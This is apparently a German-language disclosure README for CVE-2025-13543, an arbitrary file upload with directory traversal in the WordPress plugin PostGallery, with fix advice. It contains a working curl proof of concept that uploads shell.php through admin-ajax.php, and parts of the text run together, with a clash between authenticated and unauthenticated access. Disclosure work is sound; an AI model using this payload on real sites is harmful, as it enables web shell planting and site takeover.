
Offenlegung für CVE-2025-13543
Offenlegung für CVE-2025-13543
Dieses Repository legt eine Schwachstelle offen, die im PostGallery <= 1.12.5, einem WordPress-Plugin, entwickelt von rtowebsites, entdeckt wurde.
| CVE-ID | Typ | Komponente | Auswirkung |
|---|
| CVE-2025-13543 | Authentifizierter (Abonnent+) Beliebiger Datei-Upload | lib/ajax-actions/imageUpload.php admin/PostGalleryUploader.php | Nicht authentifizierter Angreifer kann beliebige Datei hochladen |
postgalleryAjaxUpload) und PostGalleryUploader-Backendcurl -k -X POST "http://localhost:8080/wp-admin/admin-ajax.php" \
-H "Cookie: wordpress_logged_in_<hash>=<your_cookie>" \
-F "action=postgalleryAjaxUpload" \
-F "postid=1" \
-F "uploadFolder=../../../" \
-F "name=shell.php" \
-F "[email protected];type=application/x-php"
wp-config.php und Datenbank-Anmeldeinformationen, Bereitstellung persistenter Hintertüren und Erstellung von Schatten-Administratorkonten.lib/ajax-actions/imageUpload.php sollte eine ordnungsgemäße Autorisierung erzwungen werden (z. B. current_user_can('upload_files') erfordern) und ein kryptografischer Nonce vor der Verarbeitung von Uploads validiert werden.admin/PostGalleryUploader.php sollte uploadFolder strikt auf ein bekanntes Unterverzeichnis von wp-content/uploads/gallery beschränkt werden, jeder Wert mit ../ oder absoluten Pfaden abgelehnt werden, und Pfade vor der Verwendung normalisiert werden.wp_handle_upload() / wp_check_filetype_and_ext() und beschränken Sie Uploads auf eine Whitelist nicht ausführbarer Medientypen, wobei .php und andere ausführbare Erweiterungen in webzugänglichen Verzeichnissen explizit blockiert werden.Ich hätte nicht gedacht, dass eine so CTF-ähnliche Schwachstelle existiert. Allein ein beliebiger Datei-Upload ist schon schlimm, aber mit Directory Traversal ist es noch verzweifelter. Die Reproduktion der Schwachstelle hat viel Spaß gemacht.
Name: MooseLove
Rolle: Unabhängiger Sicherheitsforscher / Bug Hunter
Kontakt: Auf Anfrage erhältlich
Diese Beratung wird zur öffentlichen Sicherheitssensibilisierung bereitgestellt. Freie Weitergabe mit Namensnennung.